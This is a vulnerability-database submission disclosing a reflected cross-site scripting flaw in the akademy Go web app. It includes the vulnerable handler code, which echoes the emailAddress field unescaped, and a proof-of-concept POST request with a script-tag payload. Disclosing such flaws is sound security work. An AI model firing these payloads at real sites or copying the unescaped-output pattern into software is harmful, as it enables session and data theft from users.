Submit #397340: alwindoss akademy None Cross-site Scripting (XSS)info

Titlealwindoss akademy None Cross-site Scripting (XSS)
DescriptionImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in cmd/akademy/handler/handlers.go Flaw reason: in the CMD file/akademy/handler/handlers. Go line 40, output code directly provided by the user email address (obtained from the form values), without any form of filtering or escaped. This can result in Reflected XSS attacks. When a malicious user enters an email address containing a malicious script, the script will be executed on the user's browser, allowing the attacker to perform various malicious actions, such as stealing user information, manipulating user sessions, and more. Vulnerability POC: Suppose a malicious user enters an email address with a <script> tag, such as <script>alert('XSS'); </script>. When other users visit this page, their browsers execute this JavaScript code, and a warning box pops up saying "XSS", thus proving that there is a vulnerability. cmd/akademy/handler/handlers.go: ```Go // HandleLogin implements PageHandler. func (h pageHandler) HandleLogin(w http.ResponseWriter, r *http.Request) { fmt.Println("Handle Login") r.ParseForm() email := r.FormValue("emailAddress") fmt.Println("Email", email) w.Write([]byte(email)) } ``` POC: ``` POST /login HTTP/1.1 Host: 192.168.1.7:8080 Content-Length: 148 Cache-Control: max-age=0 Origin: http://192.168.1.7:8080 DNT: 1 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.1.7:8080/login Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,zh-TW;q=0.5 Cookie: csrf_token=4JyyOAwRuo9QF%2Bo71swuLmUwAEq15hh7AX/+Flas= Connection: keep-alive csrf_token=Iw9pXtxC5SGAwRuo9QF%2Bo71swuLmUwADk9tnAwRuo9QF%2Bo71swuLmUwAXbf0JbiLxPFkrjqc%2BA%3D%3D&emailAddress=<script>alert(1)</script> ``` ![image](https://github.com/user-attachments/assets/0b983660-1b03-4de4-b6df-94b35b7493da) ![image](https://github.com/user-attachments/assets/94f553fb-0320-4bc7-a4a3-6175a6e9a6e2)
Source⚠️ https://github.com/alwindoss/akademy/issues/1
User
 zihe (UID 56943)
Submission08/24/2024 10:42 (2 years ago)
Moderation09/04/2024 08:58 (11 days later)
StatusAccepted
VulDB entry276487 [alwindoss akademy up to 35caccea888ed63d5489e211c99edff1f62efdba handlers.go emailAddress cross site scripting]
Points20

PreviousOverviewNext

Want to know what is going to be exploited?

We predict KEV entries!